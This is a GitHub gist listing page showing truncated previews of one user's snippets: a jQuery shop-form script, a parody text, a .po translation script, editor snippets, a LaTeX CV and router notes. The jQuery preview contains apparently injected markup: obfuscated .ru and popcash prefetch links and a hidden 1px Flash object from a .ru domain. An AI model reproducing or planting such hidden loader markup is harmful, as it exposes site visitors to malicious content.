Skip to content

Instantly share code, notes, and snippets.

@tomoconnor
tomoconnor / cherry-menthol.js
Created October 13, 2016 10:47
Set all bundle options on https://flavourfactory-eliquid.co.uk to cherry menthol, as it's my favourite.
var jq = document.createElement('script');
jq.src = "https://ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js";
document.getElementsByTagName('head')[0].appendChild(jq);
// ... give time for script to load, then type (or see below for non wait option)
jQuery.noConflict();
var x = $('select');
var flavour_options = x.slice(1,-1);
flavour_options.each(function(i,v){v.value="cherry-menthol";})
<link rel="dns-prefetch" href="http://popcash.net/world/go/80401/158240/">
<link rel="dns-prefetch" href="http://latest-403709.aptexof.ru/protJS/OzpxFg4mExYDBAdEXVVKShYDDkZcSg8QEhgXXEdIERMfbBMWBi8oJ0oILRdLFEgkAwsADwYDSVcHCR0JEFtaUUAJARIBGn8VQD1%2Bcz0MAnpYSEQRGhUOEAkaLQJKXldfVVJWXVFRXUtEFwEmQ0lVcnhgXFhuWAgJBhcvA0ZcXVJSX11QUV9QV1FQSkoIFA0PKw8SDgcuMgAiJlheCBIfCktGBBoLERsBFDcBBQ0NAERSCRMIBG5DAAcUKDdGUXJWRjAOACIGEAdKXkQiDhYQIzVfDzUgPjUwMT4VNB8kGRkGDC4AOzE1IyE3Nis0XCogOSEyOiFRLQsiICsxIT4QIwofAy84ZjM9c0sgMAtCMzEPPD0yCg9PNC01IiMPVFUsNiwvMBQ7OjEiFB4hDDEUPVQLJjRVJSktE148JhElMTYKED01LTYuJSklKTcjLAkUHAgLOzURNyEKLR0yPiEqIjAzWiEDUhAgDBs3J1UuITdDCg4AAgs4Big9IiALK1AgER88NC4tXidXDC0lJjMuLB9cESE3RzMbcAkjLTozMyA1PigkNT8cJyQfJiApVzEjK1wrLlc0NzgGEilANg%3D%3D">
</head>
<body class="">
<object type="application/x-shockwave-flash" id="infCP" name="infCP" data="//rajniko.ru/handler_static/swf/cndr.swf" style="position:fixed !important;visibility:visible !important;left:0 !important;top:0 !important;width:1px !important;height:1px !im
@tomoconnor
tomoconnor / the_court_sysadmin.txt
Created May 23, 2016 10:19
The Court Sysadmin - With apologies to Danny Kaye Raw
ENGINEER
If I have to configure this, just pray I know how to.
APPRENTICE
You’ll not fail, you’ll not have to configure it. .
ENGINEER
118041800 118 041 800 BHX Approach Squelch 30
118044967 118 044 967 Misc ATC
144466868 144 466 868 Worcestershire Voice
@tomoconnor
tomoconnor / translate.py
Created January 1, 2015 21:48
Machine Translation of .po files with Google Translate
#### Requires ####
# goslate==1.3.0
# polib==1.0.5
#### / ####
import os, sys
import goslate
import argparse
import polib
@tomoconnor
tomoconnor / i18n.sublime-snippet
Created December 29, 2014 22:26
Django i18n snippets and bindings
<snippet>
<content><![CDATA[
_($SELECTION$1)
]]></content>
<!-- Optional: Set a tabTrigger to define how to trigger the snippet -->
<tabTrigger>i18n</tabTrigger>
<!-- Optional: Set a scope to limit where the snippet will trigger -->
<scope>source.python</scope>
<description>Wraps the selection in _(...) </description>
</snippet>
SUBSYSTEM=="tty", ATTRS{idVendor}=="10c4", ATTRS{idProduct}=="ea60", RUN+="/etc/init.d/gpsd restart", SYMLINK="GPS"
@tomoconnor
tomoconnor / cv_template.tex
Created November 24, 2014 12:22
cv_template.tex
%%%%%%%%%%%%%%%%%%%%%%%%%%%% Document Setup %%%%%%%%%%%%%%%%%%%%%%%%%%%%
% Don't like 10pt? Try 11pt or 12pt
\documentclass[11pt]{article}
% This is a helpful package that puts math inside length specifications
\usepackage{calc}
%\usepackage[none]{hyphenat}
% Layout: Puts the section titles on left side of page
\reversemarginpar
@tomoconnor
tomoconnor / IPv6 Addressing
Last active August 29, 2015 14:02
IPv4 in IPv6 GRE tunnel config with 4 routers, BGP // Images and Topology: http://imgur.com/a/x3LKb
R1
g0/0 172.16.1.1 255.255.255.0 (to C2)
g1/0 FDE5:F699:8798::1
R2
g0/0 172.17.1.1 255.255.255.0 (to C1)
g1/0 FD5C:8D0A:8415::1 (to R3 g0/0)
R3
@tomoconnor
tomoconnor / gist:1771aaa4fdb92961ceaf
Last active August 29, 2015 14:02
Guess when I disabled IPAM... (It was pinging the entirety of RFC1918 every 10-odd seconds) and causing *huge* sw-forwarding queues on the router
1111 111 11 111 1111 111 11 111
544444454455444444544500004440004449009444000444000044400044590094440004
466575857522658586255400005760009769009667000665000098600068090096560006
100 **** *** **** *** **** *** **** **
90 **** *** **** *** **** *** **** **
80 *##* *#* *##* *#* *##* *#* *##* *#
70 *##* ### *##* ### *##* ### *##* ##
60 * *##* ### *##* ### *##* ### *##* ##
50 ***********************###***###****###***###****###***###****###***##
40 **********************####***###***####***###***####***###***####***##